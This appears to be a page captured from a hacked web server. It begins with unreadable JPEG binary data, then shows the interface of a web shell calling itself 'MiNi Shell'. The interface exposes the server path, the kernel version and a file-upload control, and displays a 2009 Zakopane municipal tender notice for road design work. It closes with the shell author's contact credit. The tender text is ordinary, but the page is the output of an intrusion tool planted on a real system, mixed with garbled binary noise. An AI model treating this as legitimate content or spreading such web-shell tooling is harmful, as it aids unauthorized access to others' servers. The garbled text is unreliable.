JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090703/104541-N-2009.html

<p class="kh_header"><b>Zakopane: ZP/341/28/09 wykonanie dokumentacji projektowo-kosztorysowej  przebudowy ul. Walowa Góra w Zakopanem</b><br>
<b>Numer ogłoszenia: 104541 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/341/28/09 wykonanie dokumentacji projektowo-kosztorysowej  przebudowy ul. Walowa Góra w Zakopanem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie i dostarczenie dokumentacji projektowo - kosztorysowej dla zadania inwestycyjnego: nr 33/08 o nazwie: Przebudowa ul. Walowa Góra w Zakopanem
1.	Zakres przedmiotu zamówienia obejmuje:
1.1.	sporządzenie bądź pozyskanie aktualnej mapy sytuacyjno - wysokościowej  
i ewidencyjnej
1.2.	przygotowanie kompletnego wniosku wraz z załącznikami do uzyskania decyzji 
o zezwoleniu na realizację inwestycji drogowej, w szczególności:
1.2.1	ustalenie istniejącego przebiegu pasa drogowego,
1.2.2	wykonanie wykazu właścicieli nieruchomości objętych inwestycją, opartego na zapisach w księgach wieczystych, a w razie ich braku 
w rejestrze gruntów,
1.2.3	ustalenie projektowanego przebiegu pasa drogowego,
1.2.4	wskazanie w terenie projektowanego pasa drogowego,
1.2.5	porównanie istniejącego i projektowanego przebiegu pasa drogowego,
1.2.6	wykonanie projektu podziału działek dla istniejącego pasa drogowego,
1.2.7	wykonanie projektu podziału działek dla projektowanego pasa drogowego,
1.2.8	przygotowanie kompletnego wniosku i uzyskanie pozwolenia wodnoprawnego,
1.2.9	przygotowanie kompletnego wniosku i uzyskanie decyzji o ustaleniu warunków środowiskowych,
1.2.10	opracowanie raportu o oddziaływaniu przedsięwzięcia na środowisko wynikającego z decyzji o ustaleniu warunków środowiskowych, 
1.2.11	uzyskanie innych wymaganych prawem stosownych uzgodnień, postanowień lub decyzji wynikających ze specyfiki opracowania projektowego,
1.2.12	opracowanie projektu budowlanego,
1.3.	pozyskanie badań nawierzchni, kruszyw gruntów i ugięć sprężystych w zależności od potrzeb projektu,
1.4.	opracowanie projektu wykonawczego,
1.5.	opracowanie przedmiaru robót z podaniem podstawy wycen,
1.6.	opracowanie kosztorysu inwestorskiego,
1.7.	opracowania Specyfikacji Technicznych Wykonania i Odbioru Robót na wszystkie elementy, dostosowanych do specyfiki  i skomplikowania realizowanych robót.
..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości 1.000,00  zł  ( słownie:  jeden tysiąc    złotych)

2.	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2) poręczeniach bankowych;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn.zm.).

3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85124047481111000048718666 Wadium powinno znajdować się na koncie zamawiającego najpóźniej w terminie składania ofert tj 10 lipca   2009r. do godz.  12°°
Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj. 10 lipca  2009r.do godz. 12°° w  Biurze  ds. zamówień publicznych pok. nr 8 /parter/.
        
  UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

4.	ZWROT WADIUM : 
1) Zamawiający zwraca niezwłocznie wadium, jeżeli:
a) upłynął termin związania ofertą;
b) zawarto umowę w sprawie zamówienia publicznego 
c) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
      2)  Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy: 
a) który wycofał ofertę przed upływem terminu składania ofert;
b) który został wykluczony z postępowania;
c) którego oferta została odrzucona.
3)   Zamawiający żąda  ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie ppkt 2 lit. b i c  jeżeli w wyniku  ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego 
4) Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

      Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na  
      wezwanie, o którym mowa w art. 26 ust. 3ustawy  nie złożył dokumentów lub oświadczeń, o  
      których mowa w art. 25 ust. 1 ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z 
      przyczyn nie leżących po jego stronie. 
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki zawarte w art.22 ust.1 ustawy Prawo zamówień publicznych tj.:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia, lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia


3)	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia;


4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 ustawy Prawo zamówień publicznych
Opis sposobu dokonywania oceny spełnienia warunków:
 Doświadczenie: 
Wykonawca musi wykazać, że w ciągu ostatnich 3 lat kalendarzowych ( licząc od daty wszczęcia postępowania) a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał  co najmniej 2 dokumentacje projektowo - kosztorysowe o zakresie odpowiadającym swoim rodzajem i wartością przedmiotowi zamówienia tj. wykonaniem dokumentacji projektowo - kosztorysowej  remontu, budowy lub przebudowy drogi o długości nie mniejszej niż 0,3 km każda


Potencjał kadrowy, 
Wykonawca musi  wykazać ,że zapewni opracowanie dokumentacji projektowej  przez osoby, posiadające uprawnienia budowlane w specjalności drogowej bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych  przepisów, należące do właściwej izby Inżynierów Budownictwa, zapewnią do wykonania opracowań branżowych udział osób posiadających uprawnienia do pełnienia funkcji projektanta bez ograniczeń w danej specjalności, lub odpowiadające im wydane na podstawie wcześniejszych przepisów  a w przypadku opracowań i czynności geodezyjnych udział osób uprawnionych do ich wykonywania.
 
Potencjał , techniczny, finansowo- ekonomiczny 
Wykonawca musi  w tym zakresie złożyć stosowne oświadczenia. 

Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.aktualny odpis z właściwego rejestru , albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru , lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.podpisane oświadczenia o spełnianiu warunków, stanowiące załącznik nr 1i 1a  do niniejszej siwz,

3.na potwierdzenie wymaganego doświadczenia wykonawca zobowiązany jest załączyć do ofert wykaz (należy wypełnić załącznik nr 4 do niniejszej siwz) wykonywanych w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania , a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie świadczył usługi odpowiadające swoim rodzajem i  wartością usługom stanowiącym przedmiot zamówienia -. 2 dokumentacje projektowo - kosztorysowe o zakresie odpowiadającym swoim rodzajem i wartością przedmiotowi zamówienia tj. wykonaniem dokumentacji projektowo - kosztorysowej  remontu, budowy lub przebudowy drogi o długości nie mniejszej niż 0,3 km każda

Wykonawca zobowiązany jest do powyższego wykazu załączyć dokumenty (np; referencje) potwierdzające, że podane w wykazie usługi zostały wykonane należycie.

4.wypwłniony druk oferty stanowiący załącznik nr 2 do niniejszej siwz(wykonawca może założyć ofertę na własnym formularzu, lecz jego  treść i układ muszą być zgodne z formularzem załączonym do siwz).

5. wykaz osób( należy wypełnić załącznik nr 5 do niniejszej siwz i do oferty załączyć kserokopie  uprawnień  wykazanych osób oraz kserokopie aktualnej przynależności tych osób do właściwej izby samorządu zawodowego) , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności;* 
 lub  pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa , wykonawca wskazał osoby, którymi będzie dysponował ,  

Z wykazu lub  pisemnego zobowiązania innego podmiotu musi wynikać , że wykonawca   dysponuje lub będzie dysponował  osobami :
 - posiadającymi uprawnienia budowlane w specjalności drogowej bez ograniczeń lub odpowiednich wydanych na podstawie      wcześniejszych  przepisów, należące do właściwej izby Inżynierów Budownictwa,- 
         - które zapewnią do wykonania opracowań branżowych  części  składowych projektu 
            budowlanego, udział osób posiadających uprawnienia do pełnienia funkcji projektanta 
             bez ograniczeń w danej specjalności, lub    odpowiadające im wydane na podstawie 
            wcześniejszych przepisów  łącznie     z aktualnym zaświadczeniami o wpisie na listę  
            samorządu zawodowego 



XIV  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt XIII -1 niniejszej specyfikacji, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
Uwaga! Dokument, o którym  mowa  powyżej powinien  być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu o którym mowa  w pkt XIV a  zastępuje się go  dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania

UWAGA! 
Dokumenty mogą być przedstawione w formie kopii  (kserokopii)  poświadczonych za zgodność z oryginałem  przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji
Urząd Miasta Zakopane
ul. Kościuszki 13]
34-500 Zakopane.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2009 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok. 8 
Urząd Miasta Zakopane
ul. Kościuszki 13]
34-500 Zakopane.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zobowiązuje się  wykonawcę którego oferta zostanie uznana za najkorzystniejszą do opracowania i uzgodnienia z Zamawiającym przed zawarciem umowy harmonogramu rzeczowo finansowego uwzględniającego poszczególne elementy- etapy zamawianego zadania wyszczególnione w p. 1.(wzór harmonogramu stanowi załącznik do wzoru umowy załączonego do niniejszej siwz) 

Przyjęte przez  wykonawcę ( projektanta) założenia wstępne do projektu podlegają uzgodnieniu  Zamawiającego
W oparciu o art.144 ust.1 ustawy zamawiający informuje, że:
1.	Zamawiający zastrzega sobie możliwość rezygnacji z wykonywania wybranych  etapów harmonogramu rzeczowo-finansowego  stanowiącego zał. nr 1  umowy, których wykonanie okaże się zbędne z uwagi na zupełność dokumentacji lub niecelowe w szczególności w  wypadku zmian w przepisach prawa uniemożliwiających lub w znacznym stopniu utrudniających wykonanie inwestycji, negatywnego odbioru społecznego dla danej inwestycji


2.	W  przypadku zwłoki, z przyczyn  nie leżących po stronie wykonującego zamówienie, spowodowanej przedłużeniem procedur administracyjnych związanych ze zleceniem, lub przedłużającymi się  uzgodnieniami  Zamawiającego  z właścicielami terenu przeznaczonego pod inwestycję, Zamawiający dopuszcza przedłużenie terminu wykonania umowy w formie aneksu, z zachowaniem przepisów ustawy o finansach publicznych.

3.	Wykonawca może dokonywać zmiany kluczowych projektantów, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą zamawiającego, akceptującego nowego kluczowego projektanta. 
3.1.	Wykonawca z własnej inicjatywy proponuje zmianę kluczowych projektantów 
w następujących przypadkach:
3.1.1.	śmierci, choroby lub innych zdarzeń losowych kluczowego projektanta,
3.1.2.	nie wywiązywania się  kluczowego projektanta z obowiązków  wynikających 
z umowy,
3.1.3.	jeżeli zmiana kluczowego projektanta stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacja itp.),
3.2.	Zamawiający może zażądać od wykonawcy zmiany kluczowego projektanta, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy,
3.3.	w przypadku zmiany kluczowego projektanta, nowy kluczowy projektant musi spełniać wymagania określone dla danego projektanta.
3.4.	Wykonawca obowiązany jest zmienić kluczowego projektanta zgodnie

Creat By MiNi SheLL
Email: jattceo@gmail.com